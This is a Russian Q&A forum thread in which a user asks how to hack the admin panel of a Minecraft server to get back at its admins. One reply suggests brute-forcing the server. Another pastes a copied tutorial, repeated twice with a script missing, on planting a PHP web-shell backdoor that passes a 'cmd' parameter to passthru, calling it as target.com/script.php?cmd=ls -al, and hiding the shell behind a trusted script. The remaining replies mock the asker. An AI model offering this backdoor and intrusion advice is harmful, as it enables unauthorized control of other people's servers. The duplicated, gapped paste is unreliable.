Клиентские игры
Кто знает как можно взломать админку в майнкрафте на сервере PixelWorld
Server обманывает на команды кароче, админы дцп. Хочу взломать.
Наиль Мирзаев
137
очень просто заходи на сервер арендатора и подберешь либо буриш сервер пока не зайдеш
Для того, чтобы закрепиться в системе после получения веб шела, может
воспользоваться скриптами (r57shell, nstview) либо "протроянит php/cgi скрипты",
(-1) например, так:
<?
$cmd = @$_GET['cmd'];
if ($cmd)
{
passthru($cmd);
exit;
}
?>
В данном примере, ставит этот код в начало php скрипта находящегося на сервере,
сохраняет. И обратившись к нему через браузер: target.com/script.php?cmd=ls -al
где: target.com - "жертва", script.php - протрояненый скрипт, cmd параметр из кода,
ls -al - команда. Таким образом у него будет возможность выполнения команд на сервере
через скрипт.
(-2) Если взломщик хочет чтобы веб шелл не легко было засечь он может
воспользоваться скриптом такого содержания:
В данном примере, ставит этот код в начало php скрипта находящегося на сервере,
сохраняет. И обратившись к нему через браузер: target.com/script.php?cmd=ls -al
где: target.com - "жертва", script.php - протрояненый скрипт, cmd параметр из кода,
ls -al - команда. Таким образом у него будет возможность выполнения команд на сервере
через скрипт.
(-2) Если взломщик хочет чтобы веб шелл не легко было засечь он может
воспользоваться скриптом такого содержания:
Где: if($var==1) если переменная var = 1, то запускается файл, ("путь до скрипта") - сюда
вписывается полный путь до веб шела.
С этим скриптом он сделает тоже, что и со скриптом данным мною раньше, просто поставит
его код, в начало php скрипта, и обратившись к нему через браузер так:
target.com/file.php&var=1
запустится файл веб шела. Т. е получаем следующее: взломщик обратился не по адресу веб
шела, а по адресу "доверительного" php скрипта, это снизит подозрение на то что на
сервере находится веб шелл.
В том случае, если на сервере включена опция safe mode, взломщик сможет её обойти, но
реализация выполнение команд в этом случае неудобна,
И так далее
Для того, чтобы закрепиться в системе после получения веб шела, может
воспользоваться скриптами (r57shell, nstview) либо "протроянит php/cgi скрипты",
(-1) например, так:
<?
$cmd = @$_GET['cmd'];
if ($cmd)
{
passthru($cmd);
exit;
}
?>
В данном примере, ставит этот код в начало php скрипта находящегося на сервере,
сохраняет. И обратившись к нему через браузер: target.com/script.php?cmd=ls -al
где: target.com - "жертва", script.php - протрояненый скрипт, cmd параметр из кода,
ls -al - команда. Таким образом у него будет возможность выполнения команд на сервере
через скрипт.
(-2) Если взломщик хочет чтобы веб шелл не легко было засечь он может
воспользоваться скриптом такого содержания:
В данном примере, ставит этот код в начало php скрипта находящегося на сервере,
сохраняет. И обратившись к нему через браузер: target.com/script.php?cmd=ls -al
где: target.com - "жертва", script.php - протрояненый скрипт, cmd параметр из кода,
ls -al - команда. Таким образом у него будет возможность выполнения команд на сервере
через скрипт.
(-2) Если взломщик хочет чтобы веб шелл не легко было засечь он может
воспользоваться скриптом такого содержания:
Где: if($var==1) если переменная var = 1, то запускается файл, ("путь до скрипта") - сюда
вписывается полный путь до веб шела.
С этим скриптом он сделает тоже, что и со скриптом данным мною раньше, просто поставит
его код, в начало php скрипта, и обратившись к нему через браузер так:
target.com/file.php&var=1
запустится файл веб шела. Т. е получаем следующее: взломщик обратился не по адресу веб
шела, а по адресу "доверительного" php скрипта, это снизит подозрение на то что на
сервере находится веб шелл.
В том случае, если на сервере включена опция safe mode, взломщик сможет её обойти, но
реализация выполнение команд в этом случае неудобна,
И так далее
Александр Козлов
Он на донат сто рублей заработать не может, а ты тут формулы такие ему пишешь, он же захлебнется в них хд
Тебе денег не хватит нанять хакера, который подобное провернет
Валерий Калюжный
69 901
Мамкин хакер, сейчас Пентагон взломаю и помогу тебе
Ни как
Похожие вопросы
- В майнкрафте на сервере появился какой-то Username666
- Как быстро бегать на шифте в майнкрафт на сервере? Какая функция чита?
- Как вернуть былые ощущения, когда я первый раз зашёл на сервер в Майнкрафт
- Что за проблема создать сервер в майнкрафте ?
- Вопрос по серверу майнкрафт
- Ищу майнкрафт сервер с пвп 1.9+, НО НЕ ПРОСТОКРАФТ, про него не пишите, про него все знают
- Майнкрафт сервер. Хочу ограничить мир.
- Где создать сервер в Майнкрафт?
- Создание сервера майнкрафт (пиратка)
- Какие есть сервера майнкрафт?